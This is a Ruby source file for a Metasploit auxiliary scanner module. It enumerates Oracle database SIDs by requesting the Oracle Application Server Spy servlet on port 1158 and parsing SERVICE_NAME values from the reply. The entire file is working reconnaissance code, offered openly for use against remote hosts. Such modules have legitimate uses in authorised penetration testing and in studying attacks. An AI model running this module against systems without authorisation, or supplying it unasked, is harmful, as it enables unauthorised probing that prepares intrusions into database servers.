## # $Id$ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner def initialize super( 'Name' => 'Oracle Application Server Spy Servlet SID Enumeration', 'Description' => %q{ This module makes a request to the Oracle Application Server in an attempt to discover the SID. }, 'Version' => '$Revision$', 'References' => [ [ 'URL', 'http://dsecrg.com/files/pub/pdf/Different_ways_to_guess_Oracle_database_SID_(eng).pdf' ], ], 'Author' => [ 'MC' ], 'License' => MSF_LICENSE ) register_options( [ Opt::RPORT(1158) ], self.class) end def run_host(ip) begin res = send_request_raw({ 'uri' => '/servlet/Spy?format=raw&loginfo=true', 'method' => 'GET', 'version' => '1.1', }, 5) if ( res.body =~ /SERVICE_NAME=/ ) select(nil,nil,nil,2) sid = res.body.scan(/SERVICE_NAME=([^\)]+)/) report_note( :host => ip, :port => datastore['RPORT'], :proto => 'tcp', :type => 'oracle_sid', :data => "#{sid.uniq}", :update => :unique_data ) print_good("#{rhost}:#{rport} Discovered SID: '#{sid.uniq}'") else print_error("Unable to retrieve SID for #{ip}...") end rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout rescue ::Timeout::Error, ::Errno::EPIPE end end end